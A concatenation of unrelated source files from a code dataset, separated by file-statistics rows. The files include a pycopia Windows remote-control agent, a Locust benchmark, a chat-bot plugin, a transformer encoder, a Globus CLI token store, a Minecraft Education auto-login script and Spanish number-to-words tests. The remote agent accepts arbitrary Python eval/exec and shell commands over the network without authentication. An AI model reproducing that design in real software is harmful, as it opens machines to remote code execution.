except KeyError:
return -errno.ENOENT
else:
proc.kill()
sts = proc.wait()
return sts
def killall(self):
rv = []
for pid in self._procs:
rv.append(self.kill(pid))
return rv
def plist(self):
return list(self._procs.keys())
def spawn(self, cmd, user=None, async=True):
# keep the "async" parameter for compatibility with the
# PosixServer.
if user:
cmd = ("runas /user:%s " % user) + cmd
UserLog.msg("spawn", cmd)
L = split_command_line(cmd)
pid = os.spawnv(os.P_DETACH, L[0], L)
return pid
def pipe(self, cmd):
UserLog.msg("pipe", cmd)
proc = os.popen(cmd, 'r')
text = proc.read()
sts = proc.close()
if sts is None:
sts = 0
return ExitStatus(cmd, sts), text
def python(self, snippet):
try:
code = compile(str(snippet) + '\n', '<WindowsServer>', 'eval')
rv = eval(code, globals(), vars(self))
except:
t, v, tb = sys.exc_info()
return '*** %s (%s)' % (t, v)
else:
return rv
def pyexec(self, snippet):
try:
code = compile(str(snippet) + '\n', '<WindowsServer>', 'exec')
exec(code, globals(), vars(self))
except:
t, v, tb = sys.exc_info()
return '*** %s (%s)' % (t, v)
else:
return
# method that exists just to check if everything is working
def alive(self):
return True
def suicide(self):
"Kill myself. The server manager will ressurect me. How nice."
global _EXIT
_EXIT = True
def clean(self):
self.chdir("C:\\tmp")
for f in self.flist():
try:
self.fclose(f)
except:
pass
for pid in self.plist():
try:
self.kill(pid)
except:
pass
def NetUseAdd(self, drive, share, username=None, domainname=None, password=None):
"""Calls Windows API to map a drive. Note that this does not automatically use DFS."""
ui2={}
ui2['local'] = "%s:" % drive[0].upper()
ui2['remote'] = str(share) # \\servername\sharename
ui2['asg_type'] = USE_DISKDEV
if username:
ui2['username'] = str(username)
if domainname:
ui2['domainname'] = str(domainname)
if password:
ui2['password'] = str(password)
return win32net.NetUseAdd(None,2,ui2)
def NetUseDelete(self, drive, forcelevel=0):
"""Remove a mapped drive."""
ui2 = win32net.NetUseGetInfo(None, "%s:" % drive[0].upper(), 2)
return win32net.NetUseDel(None, ui2['remote'], max(0, min(forcelevel, 3)))
#win32net.USE_NOFORCE
#win32net.USE_FORCE
#win32net.USE_LOTS_OF_FORCE
def net_use(self, drive, share, user=None, domainname=None, password=None):
"""Map a drive on a Windows client using the *net* command."""
cmd = "net use %s: %s %s" % (drive[0].upper(), share, IF(password, password, ""))
if user:
cmd += " /USER:%s%s" % (IF(domainname, "%s\\"%domainname, ""), user)
return self.pipe(cmd)
def net_use_delete(self, drive):
"""Unmap a drive on a Windows client using the *net* command."""
cmd = "net use %s: /delete /y" % (drive[0].upper(),)
return self.pipe(cmd)
def md5sums(self, path):
"""Reads the md5sums.txt file in path and returns the number of files
checked good, then number bad (failures), and a list of the failures."""
from pycopia import md5lib
failures = []
counter = Counter()
md5lib.check_md5sums(path, failures.append, counter)
return counter.good, counter.bad, failures
def _get_home(self):
try: # F&*#!&@ windows
HOME = os.environ['USERPROFILE']
except KeyError:
try:
HOME = os.path.join(os.environ["HOMEDRIVE"], os.environ["HOMEPATH"])
except KeyError:
HOME = "C:\\"
return HOME
def get_tarball(self, url):
self.pushd(self._get_home())
        # fetch the tarball into the home directory with wget
exitstatus, out = self.pipe('wget -q "%s"' % (url,))
self.popd()
return exitstatus
def run_script(self, script):
"""Runs a script from a shell."""
name = os.path.join("c:\\", "tmp", "clnt%d.bat" % (os.getpid(),))
sfile = open(name, "w")
sfile.write(str(script))
sfile.write("\n") # just in case string has no newline at the end
sfile.close()
try:
sts, out = self.pipe(name)
finally:
os.unlink(name)
return ExitStatus("cmd.exe", sts), out
# for PosixServer duck typing
def mount(self, host, export, mountpoint):
"""Map a drive on a client. Same as mount on NFS. The mountpoint should
be a drive letter (without the colon). """
return self.net_use(mountpoint, r"\\%s\%s" % (host, export))
def umount(self, mountpoint):
"""Unmap a drive on a client."""
return self.net_use_delete(mountpoint)
def run_as(self, cmd, user, password):
cmd = 'runas /user:%s %s' % (user, cmd)
return self.pipe(cmd)
def get_short_pathname(self, path):
"""Get the short file name of path."""
path = cygwin2nt(path)
return win32api.GetShortPathName(path)
def win32(self, funcname, *args, **kwargs):
"""Generic interface to win32. Calls a win32api function by name."""
f = getattr(win32api, funcname)
return f(*args, **kwargs)
def hostname(self):
"""Returns the client hosts name."""
return win32api.GetComputerName()
# Windows file API interface
def CopyFile(self, src, dst):
src = cygwin2nt(src)
dst = cygwin2nt(dst)
return win32file.CopyFile(src, dst, 1)
def GetFileAttributes(self, name):
name = cygwin2nt(name)
return win32file.GetFileAttributes(name)
def GetFileAttributeFlags(self):
return {
"ARCHIVE":win32file.FILE_ATTRIBUTE_ARCHIVE,
"COMPRESSED":win32file.FILE_ATTRIBUTE_COMPRESSED,
"DIRECTORY":win32file.FILE_ATTRIBUTE_DIRECTORY,
"HIDDEN":win32file.FILE_ATTRIBUTE_HIDDEN,
"NORMAL":win32file.FILE_ATTRIBUTE_NORMAL,
"OFFLINE":win32file.FILE_ATTRIBUTE_OFFLINE,
"READONLY":win32file.FILE_ATTRIBUTE_READONLY,
"SYSTEM":win32file.FILE_ATTRIBUTE_SYSTEM,
"TEMPORARY":win32file.FILE_ATTRIBUTE_TEMPORARY,
}
def SetFileAttributes(self, name, flags):
name = cygwin2nt(name)
return win32file.SetFileAttributes(name, flags)
def add_share(self, pathname):
"""Create a new share on this server. A directory is also created. """
drive, sharename = os.path.split(pathname)
if not os.path.isdir(pathname):
os.mkdir(pathname)
shinfo={} # shinfo struct
shinfo['netname'] = sharename
shinfo['type'] = win32netcon.STYPE_DISKTREE
shinfo['remark'] = 'Testing share %s' % (sharename,)
shinfo['permissions'] = 0
shinfo['max_uses'] = -1
shinfo['current_uses'] = 0
shinfo['path'] = pathname
shinfo['passwd'] = ''
win32net.NetShareAdd(None,2,shinfo)
return sharename
def del_share(self, pathname):
"""Remove a share. Returns True if successful, False otherwise."""
drive, sharename = os.path.split(pathname)
try:
win32net.NetShareDel(None, sharename, 0)
except:
ex, val, tb = sys.exc_info()
UserLog.warn("del_share", str(ex), str(val))
return False
else:
return True
# md5sums callback for counting files
class Counter(object):
def __init__(self):
self.good = 0
self.bad = 0
def __call__(self, name, disp):
if disp:
self.good += 1
else:
self.bad += 1
######## main program #####
class AgentThread(threading.Thread):
""" Agent runs in this thread.
"""
def __init__(self, stopcallback):
threading.Thread.__init__(self)
Log.msg("Win32Agent", "initializing")
self._stopcallback = stopcallback
def run(self):
try:
run_server()
except Exception as x :
Log.error("NS daemon","COULD NOT START!!!",x)
raise SystemExit
self._stopcallback()
def run_server():
os.chdir(r"C:\tmp")
Pyro.core.initServer(banner=0, storageCheck=0)
ns=Pyro.naming.NameServerLocator().getNS()
daemon=Pyro.core.Daemon()
daemon.useNameServer(ns)
uri=daemon.connectPersistent(Win32Agent(),
"Agents.%s" % (win32api.GetComputerName().lower(),))
daemon.requestLoop(_checkexit)
daemon.shutdown()
def _checkexit():
global _EXIT
return not _EXIT
class RemoteAgentService(BasicNTService):
_svc_name_ = 'RemoteAgentService'
_svc_display_name_ = "Remote Agent Server"
_svc_description_ = 'Provides Windows remote control agent.'
def __init__(self, args):
super(RemoteAgentService, self).__init__(args)
if not os.path.isdir(Pyro.config.PYRO_STORAGE):
os.mkdir(Pyro.config.PYRO_STORAGE)
self._thread = AgentThread(self.SvcStop)
def _doRun(self):
self._thread.start()
def _doStop(self):
self._thread.join()
self._thread = None
if __name__ == '__main__':
RemoteAgentService.HandleCommandLine()
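# --- Illustrative usage sketch (not part of the original module) ---
# A controller on another machine can reach the running agent through the Pyro 3
# name server under the name "Agents.<computername>". "winhost" is a placeholder
# for the Windows machine's computer name; pycopia's own client helpers could be
# used instead of these raw Pyro calls.
#
# import Pyro.core
# agent = Pyro.core.getProxyForURI("PYRONAME://Agents.winhost")
# print(agent.hostname(), agent.platform())
# status, output = agent.pipe("ipconfig /all")
# print(status, output)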
| 31.475532
| 119
| 0.590935
| 25,459
| 0.860479
| 0
| 0
| 0
| 0
| 0
| 0
| 7,034
| 0.23774
|
49fe4d073489d2871ae5e7fb65b3eed92cc792a4
| 372
|
py
|
Python
|
benchmark/info_locust.py
|
dmitryhd/avio
|
4e99c123de12a682f1ac1141899d670fbab81de6
|
[
"MIT"
] | 2
|
2018-05-28T14:15:00.000Z
|
2018-10-15T09:33:38.000Z
|
benchmark/info_locust.py
|
dmitryhd/avio
|
4e99c123de12a682f1ac1141899d670fbab81de6
|
[
"MIT"
] | null | null | null |
benchmark/info_locust.py
|
dmitryhd/avio
|
4e99c123de12a682f1ac1141899d670fbab81de6
|
[
"MIT"
] | null | null | null |
from locust import HttpLocust, TaskSet
def login(l):
l.client.post("/login", {"username": "ellen_key", "password": "education"})
def info(l):
l.client.get("/_info")
def profile(l):
l.client.get("/profile")
class UserBehavior(TaskSet):
tasks = {info: 1}
class WebsiteUser(HttpLocust):
task_set = UserBehavior
min_wait = 0
max_wait = 0
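# --- Illustrative usage note (not part of the original file) ---
# With min_wait/max_wait at 0 every simulated user hits /_info back-to-back.
# A typical invocation (the host URL is a placeholder) would be:
#   locust -f benchmark/info_locust.py --host=http://localhost:8890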
| 15.5
| 79
| 0.647849
| 142
| 0.38172
| 0
| 0
| 0
| 0
| 0
| 0
| 68
| 0.182796
|
b700ba706143879736399c02f81312c27b36379e
| 513
|
py
|
Python
|
userbot/plugins/funtxts.py
|
kumar451/CatUserbot
|
44fab853232fad163fee63565cc4f3e645596527
|
[
"MIT"
] | null | null | null |
userbot/plugins/funtxts.py
|
kumar451/CatUserbot
|
44fab853232fad163fee63565cc4f3e645596527
|
[
"MIT"
] | null | null | null |
userbot/plugins/funtxts.py
|
kumar451/CatUserbot
|
44fab853232fad163fee63565cc4f3e645596527
|
[
"MIT"
] | null | null | null |
import nekos
from ..utils import admin_cmd
@borg.on(admin_cmd(pattern = "tcat$"))
async def hmm(cat):
if cat.fwd_from:
return
reactcat = nekos.textcat()
await cat.edit(reactcat)
@borg.on(admin_cmd(pattern = "why$"))
async def hmm(cat):
if cat.fwd_from:
return
whycat = nekos.why()
await cat.edit(whycat)
@borg.on(admin_cmd(pattern = "fact$"))
async def hmm(cat):
if cat.fwd_from:
return
factcat = nekos.fact()
await cat.edit(factcat)
| 21.375
| 38
| 0.619883
| 0
| 0
| 0
| 0
| 456
| 0.888889
| 340
| 0.662768
| 20
| 0.038986
|
b700c7a198400a2306ffbc65c60b311d50ca469c
| 2,518
|
py
|
Python
|
tests/test_thread_python_exit.py
|
justengel/continuous_threading
|
33e109df22eee202774975a3a940fb15164e6a78
|
[
"MIT"
] | 7
|
2020-05-30T05:57:39.000Z
|
2022-03-05T06:09:26.000Z
|
tests/test_thread_python_exit.py
|
justengel/continuous_threading
|
33e109df22eee202774975a3a940fb15164e6a78
|
[
"MIT"
] | 2
|
2020-05-30T15:12:44.000Z
|
2020-10-06T12:54:41.000Z
|
tests/test_thread_python_exit.py
|
justengel/continuous_threading
|
33e109df22eee202774975a3a940fb15164e6a78
|
[
"MIT"
] | 1
|
2020-03-03T19:37:44.000Z
|
2020-03-03T19:37:44.000Z
|
import time
import continuous_threading
def test_thread():
class Thread(continuous_threading.Thread):
def _run(self, *args, **kwargs):
print('here')
th = Thread()
th.start()
time.sleep(0.1)
def test_continuous():
class CountingThread(continuous_threading.ContinuousThread):
def __init__(self):
super(CountingThread, self).__init__()
self.counter = 0
def _run(self):
self.counter += 1
th = CountingThread()
th.start()
time.sleep(0.1)
print('Iterations', th.counter)
def test_pausable():
class PausableCountingThread(continuous_threading.PausableThread):
def __init__(self):
super(PausableCountingThread, self).__init__()
self.counter = 0
def _run(self):
self.counter += 1
th = PausableCountingThread()
th.start()
time.sleep(0.1)
th.stop()
print('Iterations (paused)', th.counter)
th.start()
time.sleep(0.1)
print('Iterations', th.counter)
def test_operation():
class SetValueThread(continuous_threading.OperationThread):
def __init__(self):
super(SetValueThread, self).__init__()
self.value = 0
def _run(self, data, *args, **kwargs):
self.value = data
th = SetValueThread()
th.start()
time.sleep(0.1)
assert th.value == 0
th.add_data(1)
time.sleep(0.1)
assert th.value == 1
any(th.add_data(i) for i in range(20000)) # th.add_data returns None, so the entire range is executed
# time.sleep(0.01) # Not needed
print('The set value', th.value, '| remaining queue size:', th.get_queue_size())
# DO NOT STOP, CLOSE, OR, JOIN THE THREAD
if __name__ == '__main__':
# Run one option at a time
import sys
# Default test run
# run_test = test_thread
# run_test = test_continuous
# run_test = test_pausable
run_test = test_operation
if len(sys.argv) > 1:
value = str(sys.argv[1]).lower()
if value == '0' or value == 'thread':
run_test = test_thread
elif value == '1' or 'continuous' in value:
run_test = test_continuous
elif value == '2' or 'paus' in value:
run_test = test_pausable
elif value == '3' or 'op' in value:
run_test = test_operation
run_test()
# You should observe that python.exe is no longer a running process when the program finishes.
# exit code should be 0
| 25.18
| 106
| 0.608817
| 812
| 0.322478
| 0
| 0
| 0
| 0
| 0
| 0
| 514
| 0.20413
|
b701550eed98d3100b7b0a2a4ed10c335a6dc06a
| 2,587
|
py
|
Python
|
src/models/transformer_encoder.py
|
tsumita/implicit_emotion
|
dae2d5a8162a2665b8e76812716068650feae710
|
[
"MIT"
] | 6
|
2018-09-03T00:55:35.000Z
|
2020-01-09T11:53:31.000Z
|
src/models/transformer_encoder.py
|
tsumita/implicit_emotion
|
dae2d5a8162a2665b8e76812716068650feae710
|
[
"MIT"
] | null | null | null |
src/models/transformer_encoder.py
|
tsumita/implicit_emotion
|
dae2d5a8162a2665b8e76812716068650feae710
|
[
"MIT"
] | 2
|
2019-06-23T11:32:27.000Z
|
2019-07-04T22:15:33.000Z
|
import copy
import torch.nn as nn
from .transformer import (Encoder,
EncoderLayer,
MultiHeadedAttention,
PositionwiseFeedforward,
PositionalEncoding)
class TransformerEncoder(nn.Module):
"""Transformer Encoder"""
def __init__(self, embedding_dim, hidden_sizes, num_layers=6, num_heads=8,
dropout=0.1, batch_first=True, use_cuda=True):
"""Take a batch of representations and add context transformer-style
Parameters
----------
embedding_dim : TODO
hidden_sizes : TODO
num_layers : TODO, optional
num_heads : TODO, optional
dropout : TODO, optional
batch_first: TODO, optional
use_cuda : TODO, optional
"""
if not batch_first:
raise NotImplementedError
super(TransformerEncoder, self).__init__()
self.embedding_dim = embedding_dim
self.hidden_sizes = hidden_sizes
self.num_layers = num_layers
self.num_heads = num_heads
self.dropout = dropout
self.use_cuda = use_cuda
self.out_dim = embedding_dim
        # FIXME: I don't know how deepcopies will work within a pytorch module
# <2018-06-25 12:06:59, Jorge Balazs>
c = copy.deepcopy
attn = MultiHeadedAttention(self.num_heads, self.embedding_dim)
ff = PositionwiseFeedforward(self.embedding_dim, self.hidden_sizes,
self.dropout)
position = PositionalEncoding(self.embedding_dim, self.dropout)
self.encoder = Encoder(
EncoderLayer(embedding_dim, c(attn), c(ff), dropout), self.num_layers
)
self.positional_embedding = c(position)
for p in self.parameters():
if p.dim() > 1:
nn.init.xavier_uniform_(p)
def forward(self, emb_batch, masks=None, lengths=None):
"""Add context to a batch of vectors
Parameters
----------
emb_batch : torch.FloatTensor, dim(batch_size, seq_len, hidden_dim)
mask : torch.Floattensor, dim(batch_size, seq_len)
lengths : kept for compatibility with other layers
Returns
-------
A torch.FloatTensor of dim(batch_size, seq_len, hidden_dim) containing
context-enriched vectors
"""
# for compatibility with Annotated Transformer implementation
masks = masks.unsqueeze(1)
return self.encoder(self.positional_embedding(emb_batch), masks)
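# --- Illustrative usage sketch (not part of the original module) ---
# Runs a batch of random embeddings through the encoder, assuming the local
# .transformer module follows the Annotated Transformer building blocks it
# imports; all sizes are arbitrary example values and the mask marks every
# position as a real token.
if __name__ == "__main__":
    import torch
    encoder = TransformerEncoder(embedding_dim=64, hidden_sizes=256,
                                 num_layers=2, num_heads=8, dropout=0.1)
    emb_batch = torch.randn(4, 12, 64)   # (batch_size, seq_len, embedding_dim)
    masks = torch.ones(4, 12)            # 1 where a real (non-padded) token is present
    out = encoder(emb_batch, masks=masks)
    print(out.shape)                     # torch.Size([4, 12, 64])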
| 32.3375
| 81
| 0.609586
| 2,328
| 0.899884
| 0
| 0
| 0
| 0
| 0
| 0
| 973
| 0.376111
|
b70252d52453ebc8294d55dbd8e4ca2fdec3a045
| 338
|
py
|
Python
|
bluebottle/members/migrations/0028_merge_20190215_1441.py
|
terrameijar/bluebottle
|
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
|
[
"BSD-3-Clause"
] | 10
|
2015-05-28T18:26:40.000Z
|
2021-09-06T10:07:03.000Z
|
bluebottle/members/migrations/0028_merge_20190215_1441.py
|
terrameijar/bluebottle
|
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
|
[
"BSD-3-Clause"
] | 762
|
2015-01-15T10:00:59.000Z
|
2022-03-31T15:35:14.000Z
|
bluebottle/members/migrations/0028_merge_20190215_1441.py
|
terrameijar/bluebottle
|
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
|
[
"BSD-3-Clause"
] | 9
|
2015-02-20T13:19:30.000Z
|
2022-03-08T14:09:17.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2019-02-15 13:41
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('members', '0026_auto_20180919_1434'),
('members', '0027_auto_20190208_1119'),
]
operations = [
]
| 19.882353
| 48
| 0.662722
| 188
| 0.556213
| 0
| 0
| 0
| 0
| 0
| 0
| 139
| 0.411243
|
b7065834b7518e12325dc5b9284ed2b6d23d7a2b
| 5,221
|
py
|
Python
|
src/globus_cli/login_manager/tokenstore.py
|
sirosen/temp-cli-test
|
416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6
|
[
"Apache-2.0"
] | 47
|
2016-04-21T19:51:17.000Z
|
2022-02-25T14:13:30.000Z
|
src/globus_cli/login_manager/tokenstore.py
|
sirosen/temp-cli-test
|
416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6
|
[
"Apache-2.0"
] | 421
|
2016-04-20T18:45:24.000Z
|
2022-03-14T14:50:41.000Z
|
src/globus_cli/login_manager/tokenstore.py
|
sirosen/temp-cli-test
|
416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6
|
[
"Apache-2.0"
] | 20
|
2016-09-10T20:25:27.000Z
|
2021-10-06T16:02:47.000Z
|
import os
import sys
import globus_sdk
from globus_sdk.tokenstorage import SQLiteAdapter
from ._old_config import invalidate_old_config
# internal constants
_CLIENT_DATA_CONFIG_KEY = "auth_client_data"
# env vars used throughout this module
GLOBUS_ENV = os.environ.get("GLOBUS_SDK_ENVIRONMENT")
GLOBUS_PROFILE = os.environ.get("GLOBUS_PROFILE")
def _template_client_id():
template_id = "95fdeba8-fac2-42bd-a357-e068d82ff78e"
if GLOBUS_ENV:
template_id = {
"sandbox": "33b6a241-bce4-4359-9c6d-09f88b3c9eef",
"integration": "e0c31fd1-663b-44e1-840f-f4304bb9ee7a",
"test": "0ebfd058-452f-40c3-babf-5a6b16a7b337",
"staging": "3029c3cb-c8d9-4f2b-979c-c53330aa7327",
"preview": "b2867dbb-0846-4579-8486-dc70763d700b",
}.get(GLOBUS_ENV, template_id)
return template_id
def internal_native_client():
"""
This is the client that represents the CLI itself (prior to templating)
"""
template_id = _template_client_id()
return globus_sdk.NativeAppAuthClient(
template_id, app_name="Globus CLI (native client)"
)
def _get_data_dir():
# get the dir to store Globus CLI data
#
# on Windows, the datadir is typically
# ~\AppData\Local\globus\cli
#
# on Linux and macOS, we use
# ~/.globus/cli/
#
# This is not necessarily a match with XDG_DATA_HOME or macOS use of
# '~/Library/Application Support'. The simplified directories for non-Windows
# platforms will allow easier access to the dir if necessary in support of users
if sys.platform == "win32":
# try to get the app data dir, preferring the local appdata
datadir = os.getenv("LOCALAPPDATA", os.getenv("APPDATA"))
if not datadir:
home = os.path.expanduser("~")
datadir = os.path.join(home, "AppData", "Local")
return os.path.join(datadir, "globus", "cli")
else:
return os.path.expanduser("~/.globus/cli/")
def _ensure_data_dir():
dirname = _get_data_dir()
try:
os.makedirs(dirname)
except FileExistsError:
pass
return dirname
def _get_storage_filename():
datadir = _ensure_data_dir()
return os.path.join(datadir, "storage.db")
def _resolve_namespace():
env = GLOBUS_ENV if GLOBUS_ENV else "production"
# namespace any user profile so that non-user namespaces may be used in the future
# e.g. for client-credentials authenticated use of the CLI
#
# expected namespaces are
#
# userprofile/production (default)
# userprofile/sandbox (env is set to sandbox, profile is unset)
# userprofile/test/myprofile (env is set to test, profile is set to myprofile)
return "userprofile/" + (f"{env}/{GLOBUS_PROFILE}" if GLOBUS_PROFILE else env)
def token_storage_adapter():
if not hasattr(token_storage_adapter, "_instance"):
# when initializing the token storage adapter, check if the storage file exists
# if it does not, then use this as a flag to clean the old config
fname = _get_storage_filename()
if not os.path.exists(fname):
invalidate_old_config(internal_native_client())
# namespace is equal to the current environment
token_storage_adapter._instance = SQLiteAdapter(
fname, namespace=_resolve_namespace()
)
return token_storage_adapter._instance
def internal_auth_client():
"""
Pull template client credentials from storage and use them to create a
ConfidentialAppAuthClient.
In the event that credentials are not found, template a new client via the Auth API,
save the credentials for that client, and then build and return the
ConfidentialAppAuthClient.
"""
adapter = token_storage_adapter()
client_data = adapter.read_config(_CLIENT_DATA_CONFIG_KEY)
if client_data is not None:
client_id = client_data["client_id"]
client_secret = client_data["client_secret"]
else:
# register a new instance client with auth
nc = internal_native_client()
res = nc.post(
"/v2/api/clients",
data={"client": {"template_id": nc.client_id, "name": "Globus CLI"}},
)
# get values and write to config
credential_data = res["included"]["client_credential"]
client_id = credential_data["client"]
client_secret = credential_data["secret"]
adapter.store_config(
_CLIENT_DATA_CONFIG_KEY,
{"client_id": client_id, "client_secret": client_secret},
)
return globus_sdk.ConfidentialAppAuthClient(
client_id, client_secret, app_name="Globus CLI"
)
def delete_templated_client():
adapter = token_storage_adapter()
# first, get the templated credentialed client
ac = internal_auth_client()
# now, remove its relevant data from storage
adapter.remove_config(_CLIENT_DATA_CONFIG_KEY)
# finally, try to delete via the API
# note that this could raise an exception if the creds are already invalid -- the
# caller may or may not want to ignore, so allow it to raise from here
ac.delete(f"/v2/api/clients/{ac.client_id}")
| 34.348684
| 88
| 0.679755
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,510
| 0.480751
|
b706818aa45f72b58b9687e3a435833411cd0110
| 5,325
|
py
|
Python
|
launchMinecraft.py
|
Timurinyo/tchrHlprStudent
|
598f0e1321b11555d327393ab78723e1e286703e
|
[
"MIT"
] | null | null | null |
launchMinecraft.py
|
Timurinyo/tchrHlprStudent
|
598f0e1321b11555d327393ab78723e1e286703e
|
[
"MIT"
] | null | null | null |
launchMinecraft.py
|
Timurinyo/tchrHlprStudent
|
598f0e1321b11555d327393ab78723e1e286703e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#coding:utf-8
__author__ = 'CoderZh and Tymur'
import sys
from time import sleep
# Important for multithreading
sys.coinit_flags = 0 # pythoncom.COINIT_MULTITHREADED
import win32com
import win32com.client
import win32gui
import win32con
import pythoncom
#import keyboard
from pathlib import Path
import os
import re
import subprocess
import psutil
def dump(obj):
for attr in dir(obj):
print("obj.%s = %r" % (attr, getattr(obj, attr)))
def getIEServer(hwnd, ieServer):
if win32gui.GetClassName(hwnd) == 'Internet Explorer_Server':
ieServer.append(hwnd)
#def connectToIEServer():
def changeLanguage(lang):
#lang should be uk_UA or en_US
userprofile_folder = os.environ['userprofile']
data_folder = Path(f"{userprofile_folder}/AppData/Local/Packages/Microsoft.MinecraftEducationEdition_8wekyb3d8bbwe/LocalState/games/com.mojang/minecraftpe/")
file_to_open = data_folder / "options.txt"
s = open(file_to_open).read()
repl_result = re.subn(r'game_language:.*', f'game_language:{lang}', s)
f = open(file_to_open, 'w')
f.write(repl_result[0])
f.close()
print("language changed")
def launchMinecraft():
subprocess.call('explorer.exe shell:appsFolder\Microsoft.MinecraftEducationEdition_8wekyb3d8bbwe!Microsoft.MinecraftEducationEdition')
def getCredentials():
cred_path = os.path.join(os.path.dirname(sys.executable), 'credentials.txt')
with open(cred_path) as f:
lines = f.readlines()
login = lines[0]
password = lines[1]
print("credentials received")
return login, password
def wait_password_page_to_load(doc, login_element):
    # Wait until the password input page is loaded; doc is the IE document object
while(login_element.className != "moveOffScreen"):
for el in doc.all:
try:
if el.name == "loginfmt" and el.className == "moveOffScreen":
login_element = el
#print(el.className)
#sleep(0.1)
except:
print("passwd screen isn't loaded yet")
#sleep(0.1)
continue
sleep(0.1)
def loginIE(login, password):
    pythoncom.CoInitializeEx(0)  # 0 == pythoncom.COINIT_MULTITHREADED; COM must be initialized on each thread that uses it
#Connect to internet explorer server instance
mainHwnd = win32gui.FindWindow('ADALWebBrowserHost', '')
if mainHwnd:
ieServers = []
win32gui.EnumChildWindows(mainHwnd, getIEServer, ieServers)
if len(ieServers) > 0:
ieServer = ieServers[0]
msg = win32gui.RegisterWindowMessage('WM_HTML_GETOBJECT')
ret, result = win32gui.SendMessageTimeout(ieServer, msg, 0, 0, win32con.SMTO_ABORTIFHUNG, 20000)
ob = pythoncom.ObjectFromLresult(result, pythoncom.IID_IDispatch, 0)
doc = win32com.client.dynamic.Dispatch(ob)
print("connected to IE server")
try:
win32gui.SetForegroundWindow(mainHwnd)
except:
print("couldn't SetForegroundWindow 1")
return False
#for i in range(2):
#Make sure that we've got all elements loaded
page_type = ""
login_not_ready = True
submit_not_ready = True
password_not_ready = True
while(login_not_ready or submit_not_ready or password_not_ready):
#Get elements from document
try:
for el in doc.all:
#Try is needed because not all elements have both name and type fields
try:
if el.name == "loginfmt":
login_element = el
login_not_ready = False
print("received login element")
if el.type == "submit":
submit_element = el
submit_not_ready = False
print("received btn element")
if el.name == "passwd":
password_element = el
password_not_ready = False
except:
print("element has no name attribute")
#sleep(0.1)
continue
except:
print("doc isn't loaded yet")
return False
sleep(0.1)
#Figure out what page is loaded
if password_element.className == "moveOffScreen":
page_type = "login_page"
elif login_element.className == "moveOffScreen":
page_type = "password_page"
if page_type == "login_page":
#Paste login
login_element.focus()
login_element.value = login
submit_element.style.backgroundColor = "#000000"
submit_element.focus()
submit_element.blur()
submit_element.click()
                wait_password_page_to_load(doc, login_element)
elif page_type == "password_page":
#Paste password
password_element.focus()
password_element.value = password
submit_element.style.backgroundColor = "#000000"
submit_element.focus()
submit_element.blur()
submit_element.click()
print("ok")
return True
else:
print("page_type unspecified")
else:
print("No IE server found")
return False
def launchMine(lessonType):
if lessonType == "PS":
changeLanguage("uk_UA")
elif lessonType == "PR":
changeLanguage("en_US")
else:
print("Unavailable lesson type specified. Should be PS or PR")
login, password = getCredentials()
launchMinecraft()
login_successfull = False
times_launched = 0
while not(login_successfull):
try:
login_successfull = loginIE(login, password)
sleep(0.5)
times_launched += 1
if times_launched > 1200:
return False
except:
print("something went completely wrong...")
return True
def closeMine():
os.system("TASKKILL /F /IM Minecraft.Windows.exe")
| 28.475936
| 159
| 0.689202
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,617
| 0.303662
|
b7076a862b13e824331a204380735697e0b6b508
| 4,158
|
py
|
Python
|
trabajo/Plugins/test_plugin_MontoEscrito.py
|
f2scali/siendo
|
5e3c20143317e365cfecb5b56a0f2388acc46949
|
[
"Apache-2.0"
] | null | null | null |
trabajo/Plugins/test_plugin_MontoEscrito.py
|
f2scali/siendo
|
5e3c20143317e365cfecb5b56a0f2388acc46949
|
[
"Apache-2.0"
] | null | null | null |
trabajo/Plugins/test_plugin_MontoEscrito.py
|
f2scali/siendo
|
5e3c20143317e365cfecb5b56a0f2388acc46949
|
[
"Apache-2.0"
] | 1
|
2021-10-01T22:22:09.000Z
|
2021-10-01T22:22:09.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'efrenfuentes'
import unittest
from plugin_MontoEscrito import numero_a_letras, numero_a_moneda
class TestNumeroLetras(unittest.TestCase):
def test_numero_demasiado_alto(self):
numero = 1000000000000
self.assertRaises(OverflowError, numero_a_letras, numero)
def test_unidades(self):
numero = 8
self.assertEqual(numero_a_letras(numero), 'ocho')
numero = 2
self.assertEqual(numero_a_letras(numero), 'dos')
numero = 0
self.assertEqual(numero_a_letras(numero), 'cero')
def test_decena_diez(self):
numero = 15
self.assertEqual(numero_a_letras(numero), 'quince')
numero = 17
self.assertEqual(numero_a_letras(numero), 'diecisiete')
numero = 19
self.assertEqual(numero_a_letras(numero), 'diecinueve')
def test_decena_veinte(self):
numero = 23
self.assertEqual(numero_a_letras(numero), 'veintitres')
numero = 26
self.assertEqual(numero_a_letras(numero), 'veintiseis')
numero = 21
self.assertEqual(numero_a_letras(numero), 'veintiuno')
def test_menores_cien(self):
numero = 32
self.assertEqual(numero_a_letras(numero), 'treinta y dos')
numero = 73
self.assertEqual(numero_a_letras(numero), 'setenta y tres')
numero = 89
self.assertEqual(numero_a_letras(numero), 'ochenta y nueve')
def test_centenas(self):
numero = 167
self.assertEqual(numero_a_letras(numero), 'ciento sesenta y siete')
numero = 735
self.assertEqual(numero_a_letras(numero), 'setecientos treinta y cinco')
numero = 899
self.assertEqual(numero_a_letras(numero), 'ochocientos noventa y nueve')
def test_miles(self):
numero = 1973
self.assertEqual(numero_a_letras(numero), 'mil novecientos setenta y tres')
numero = 5230
self.assertEqual(numero_a_letras(numero), 'cinco mil doscientos treinta')
numero = 41378
self.assertEqual(numero_a_letras(numero), 'cuarenta y un mil trescientos setenta y ocho')
numero = 197356
self.assertEqual(numero_a_letras(numero), 'ciento noventa y siete mil trescientos cincuenta y seis')
numero = 2004
self.assertEqual(numero_a_letras(numero), 'dos mil cuatro')
def test_millones(self):
numero = 11852739
self.assertEqual(numero_a_letras(numero), 'once millones ochocientos cincuenta y dos mil setecientos treinta y nueve')
numero = 2000000
self.assertEqual(numero_a_letras(numero), 'dos millones')
def test_millardos(self):
numero = 1212673201
